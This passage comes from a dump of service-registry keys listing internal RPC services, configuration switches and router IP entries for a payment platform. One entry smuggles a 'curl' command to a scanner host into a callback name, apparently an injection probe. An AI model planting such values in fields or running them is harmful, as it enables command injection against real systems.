AULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:instpay@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.116.47#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.appxcore.common.service.facade.api.material.ServiceMaterialMngConfigNgFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkmissione_campSkipGrayApproveCancelCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbcontent.common.service.facade.api.content.ContentPicQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dsmp.common.service.facade.privilege.service.v2.PrivilegeServiceFacade:1.0@tri#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.echox.service.EchoxTaskDataReader:1.0:echoagent@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.custrelation.service.facade.family.FamilyRelationInviteOperateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gffund.common.service.facade.api.notify.MessageNotifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.processmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.customJsonSuffixEndWith,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zpublishuiweb:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.customServiceGroup,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.echox.service.EchoxAopPlaybackService:1.0:vouchercore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.127.124#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.jiuzhou.client.spi.PaasActionDispatcher:1.0:guardianconsole@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insapportion.common.service.facade.ApportionUserFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.bizprodmng:name=com.alipay.routeclient.DefaultRouteCoordinator.zoneInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.ipay.imerchprod.module.merchant.facade.api.migrate.MigrateOperateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dwdssp.service.UploadSFSFileService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdalhbase:name=com.alipay.zdal.ldc.hbase.finpwm.update,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.finorm.biz.facade.api.FileTemplateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mrchstm.common.service.facade.mart.facade.AssetProjectItemQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.riskmng.riskmngSlaveDataSource.keyWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.crsociety.api.DependencyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkdepmng_largeDepositReceiptLimitCallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.merchantsettle.service.common.facade.SettleGuardianQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.DrmDebugManager.perfMonitorSceneStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ctuofflineplt.common.facade.service.VariableCleanService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpdcenter.facade.api.FpcFilterFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mdeduct.biz.agreement.internal.operation.IRemoteAgreementOperator:1.0:remoteVirtualCardSignOperator@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdalproxyquery:name=com.alipay.anthubble.proxy.ExecutionPlanChecker.maxAllowedTimeInSecond,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.insautomarket.common.facade.rule.AutoMktDecisionXRuleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.frdspcore.common.service.facade.api.DecisionSchemeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insautoagent.common.telworkbench.insure.AutoAgentQuotePortalFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcinstprod.common.service.facade.api.lawsuit.LawsuitCaseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbcraftsman.common.facade.alsc.CraftsmanDetailQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:peerpayprod_BgmngCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitydata.biz.decision.manager.securityservice.SsDecisionDataManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acassistant.common.service.facade.CommonFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.darwin.common.service.facade.api.DeployExperimentCallbackFacade:1.0:mobileappcommon@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.charityprod.commom.service.facade.CharityRefundGZFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cfpcenter.common.service.facade.specialbusiness.api.CfpSpecialTransferFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.xview.core.common.facade.CallbackService:1.0:giftprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_R_CUSTOMER#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","cn.com.antcloud.acmeteragecore.common.service.manager.MeterDomainQueryManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.common.service.facade.risk.BizTraceMonitorFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_CCRPROD#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openpunish.facade.callback.PunishmentActionCallback:1.0:tinyapp.punishmentActionCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbcheck.common.service.facade.api.CheckDataQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.common.api.DispatchReceiptService:1.0@XFIRE@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.exriskcenter.common.service.facade.api.WorkDateCalculateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.imtmsvcprod.common.service.facade.point.PointInfoQueryServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.antqnamesrv:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.responseExceptionIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:zmcustbff@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.quotationcore.common.service.facade.api.quotation.StockRemindSendFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchportalcore.common.service.facade.contactapply.BillContactApplyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.linglongmng.facade.api.LinglongRouteFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openaccess.common.quickaccess.facade.service.proxy.RefreshDomainCacheFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchiscore.common.service.facade.RouteServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_FINADVISORPROD#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.poscore:name=com.alipay.cif.client.drm.bankcardtaircache.CifQueryLocalCacheSwitcher.smartcacheUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.oceanbase.obforumcore.service.course.LecturerManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.dweg:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.xxePayloads,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.archimedes.common.service.facade.api.ValueAddComponentService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promomng.common.service.facade.workbench.ContentCategoryInfoService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.ihkprod.common.service.facade.promotion.activity.api.ActivityService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.compmng.biz.process.CpInfoProcessExtService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zcache:name=com.alipay.zcache.tbase.igtransferprodTairCache.localCacheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.arcore.common.service.facade.console.ArConsoleToolFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pointmng:name=com.alipay.common.tracer.manage.TracerDrm.zdalDbDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.83.217.99#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.kwlib:name=com.alipay.antvip.client.internal.drm.DrmControl.mainSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.cloudprovision:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.responseExceptionIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:antfeaturemeta@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zqueue.client.qaZQueue46#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.insmobile:name=com.alipay.insmobile.biz.userhome.drm.UserHomeDRM.hiddenModuleIdStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.gfinvest.facade.api.investtrade.InvestSecurityDealOptionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpensionprod.common.service.facade.PensionUserInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_ATD#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finance.filefactory.sevice.FilePlatformParseReceiver:1.0:filefactory@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cfpcenter:name=com.alipay.cif.model.cache.CifCOControlSwitch.switchCustCertifyInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.uctproc:name=com.alipay.analyze.core.scheduler.drm.UctSchedulerResource.taskScanInterval,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mitemcenter.common.service.facade.backend.api.ItemCacheQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.aliminiabilityprod.facade.api.AnalyseTaskQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promokernel.common.service.facade.api.OutPrizeInvalidFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundmng.common.service.integration.cifcustomer.CustomerQueryFacadeClient:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.18.116.189#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mrchiswisdom.job.common.service.facade.api.RepeatableJobQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.openauth.common.service.facade.rpc.AuthRelationshipFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.sofa.rpc.elastic.ElasticService:1.0:miniprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.capacitystudio.facade.CapacityPortraitFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.sofa.rpc.elastic.ElasticService:1.0:inchannel@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.riskmng.biz.system.event.listener.CreateTaskMessageSwitch.enable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchstm.common.service.facade.product.facade.AssetProductBlueCodeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","xxx.cn.com.antcloud.acparamcore.common.service.facade.api.manage.ParamStructureManageFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.secucommunity.common.service.facade.admin.api.CommonAdminOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_USERDATACONSUMER#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.baoxianprodfactory.common.service.InsLiabilityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.69.213.128#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.insusercenter.facade.thanks.api.InsThanksEvaluationMetaFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.162.126#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finpwm.facade.sceneinvest.starwish.api.StarWishFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:lifemock_MockProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.platform.schedule.concurrent.execute.Executer:1.0:approveTask@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.19.38.1#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.insmobile:name=com.alipay.insmobile.biz.userhome.drm.UserHomeDRM.sendReceiptMsg,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fininfo.common.service.facade.mng.serial.InfoSerialService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbservcenter.biz.shared.batch.BatchOrderBizService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.finfocoreCzoneTairCache_dest.czoneSwitchMap,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:basement-dqcoupontoolstwa@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finstore.common.service.facade.dmp.DmpTaskMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.malgo.common.facade.BlessingCardFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tegg.spi.SpiFacade:1.0:trserver-app@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_O_AUDIT_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.biscenter.uem.common.service.facade.permission.v2.OperationPermissionVerifyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.scheduler:name=com.alipay.common.tracer.manage.TracerDrm.zdalOssDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.DrmCdsManager.eventDropEnabled,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.paymentmng.service.facade.scienguide.RuleRefreshManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mwalletmng:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.sqlParamCheckDeny,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.clearingcenter:name=com.alipay.dtqualitycore.drm.DataqualityConfigDrm.fullStop,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finassistantcore.mng.facade.modular.api.MngModularTemplateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.accrmcore.common.service.facade.TenantFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.bbcmng.immunemng.facade.ImmChangeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.98.21#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.nodejs.ConsumerService:1.0:sffgroup-george@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dwsap.core.service.hbase.McubeManager:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilechat.biz.emotion.rpc.api.CustomEmotionRpcService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.236.84#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.mashup:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.xssClientPolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.riskmngTairCache_dest.refresh,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:caprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S_gfbill_service#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finfundcore.file.service.facade.FinFundOpenAccountApplyFileFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dt.onedata3.model.service.LogicalMetaDataService:1.0:dpblackbox@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbsalescenter.common.service.integration.fintradecenter.FintradeOrderFacadeClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.salesmng.common.service.facade.merchant.api.BizManagerIndustryPoolService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.accountcore.common.service.facade.AccountTransferFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openeval.core.service.utils.odps.OdpsClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finvirtualta.core.service.yeb.repository.LogicDbBalanceProfitRepository:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openitemcore.common.service.facade.api.afts.AftsFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_ACCTRANSQUERY#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antiep.common.service.facade.AntiepMailFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:pcreditmng_intfreeCycleBenefitProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cicada.common.service.facade.api.service.MvnDependencyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cfpcenter:name=com.alipay.cif.model.cache.CifCOControlSwitch.consistCheckWhiteListString,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.83.242.160#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_100.83.97.3#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","SOFA_PRC_TRANSMIT_FRAMODEL#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbsalescenter.biz.appointment.AppointmentQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkdepmng_fixedDepositDailyLimitAmtProcessCallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.DrmCdsManager.dingqiUrlVersion,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.paymentmng:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.notExistExpireTimeMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","HEALTHY_V2@pcreditchannelsff#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.kbsales.common.service.facade.bcm.BPInstanceFacade:1.0:bpInstanceFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.tradeapcore:name=com.alipay.cif.model.cache.CifCOControlSwitch.consistCheckWhiteListString,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.securitydata.common.service.facade.seller.SellerCreditRecordQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY@erecon#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.quotationcore.common.service.facade.api.quotation.FqpQcQuotationPlateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.amldata.biz.service.impl.supergw.ApiProcessor:1.0:corpRiskFlagProcessor@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservicesinspect.biz.shared.throttle.GeneralThrottleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.permlimit:name=com.alipay.revol.drm.LogConfig.specialLogFieldConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","imaspmng@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.dockerlabapp:name=com.alipay.routeclient.DefaultRouteCoordinator.elasticRuleVersion,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.reservecenter.facade.api.OutAllocateOrderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gffintrade.core.service.repository.FundDetailRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:curl http://86842598-80102053-uniqueId-104003020.antscanner.global.alipay.com@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finance.filefactory.sevice.FileFactoryEventListener:1.0:finslip@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_AMLCLOUD#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:basement-wealthopen2018@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.211.67#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:mrchasset_proofingCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.icif.service.facade.apiv2.CustomerService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.charityprod.commom.service.facade.CharityHeadlineConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mbill.domain.facade.ereceipt.EreceiptApplyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bizfund.common.service.facade.manage.api.CfgWhiteListFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dataphin.upgrade.sdk.common.facade.api.ModeUpgradeStepApi:1.0:dpsecurity@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zcbmarketcenter:name=com.alipay.common.tracer.manage.TracerDrm.disableMiddlewareDigestLog,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.batchpay.service.batch.bwfb.api.bg.WithholdingBGQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.financemng.common.facade.service.robot.RobotDataTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifemng.facade.ebppauto.OpenAutoAccessFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appxcore.common.service.facade.api.dataservice.DataServiceQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finassetpreference.api.facade.ConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.Arch:name=com.alipay.xts.asyncExecutor.clearingcenter.asyncExecutor,version=1.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Servers_TP_M_MOAPROD#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.finfocore:name=com.alipay.checkroute.common.service.checkersdk.drm.SDKConfigDRM.enableZdalproxyquery,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.findecision:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.responseExceptionIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchservbase.member.facade.PromotionChannelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cifglobal:name=com.alipay.cif.utils.probe.ProbeDrmSwitch.reportEnabled,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.ipay.iliquidity.biz.manager.env.TfBankAccountManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yqcore.common.service.facade.api.SpiderMessageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.24.31#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.revcore.common.service.facade.api.resource.MonitorService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fcrcportal:name=com.alipay.common.security.dresource.SecurityCommonDrm.customJsonSuffixRegex,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.cif:name=com.alipay.cif.client.drm.CifQueryLocalCacheSwitcher.guardianType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.scheduler:name=com.alipay.antvip.client.internal.drm.DrmControl.mainSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.transfercenter.common.service.facade.api.MobileProductGrayFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.service.drm.MonthlyBillDrm.showHuabei,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA-SCHEDULER-S-ipromomng-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.minishopprod.common.service.facade.api.ShopOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.opensupport.common.service.facade.onestopmng.OstsIntegrationCoreFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.qianli.common.service.neardata.facade.QianliHeartBeatFacade:1.0:mobilechat@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kmi.common.service.facade.KeyApplicationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inscontentprod.common.service.facade.ballot.BallotFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudbox:name=com.alipay.common.security.dresource.SecurityCommonDrm.totalUrlDecodeTimes,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.cfpcenter:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableLoadTestIsland,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.insmobile:name=com.alipay.common.tracer.manage.TracerDrm.zdalDbDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#S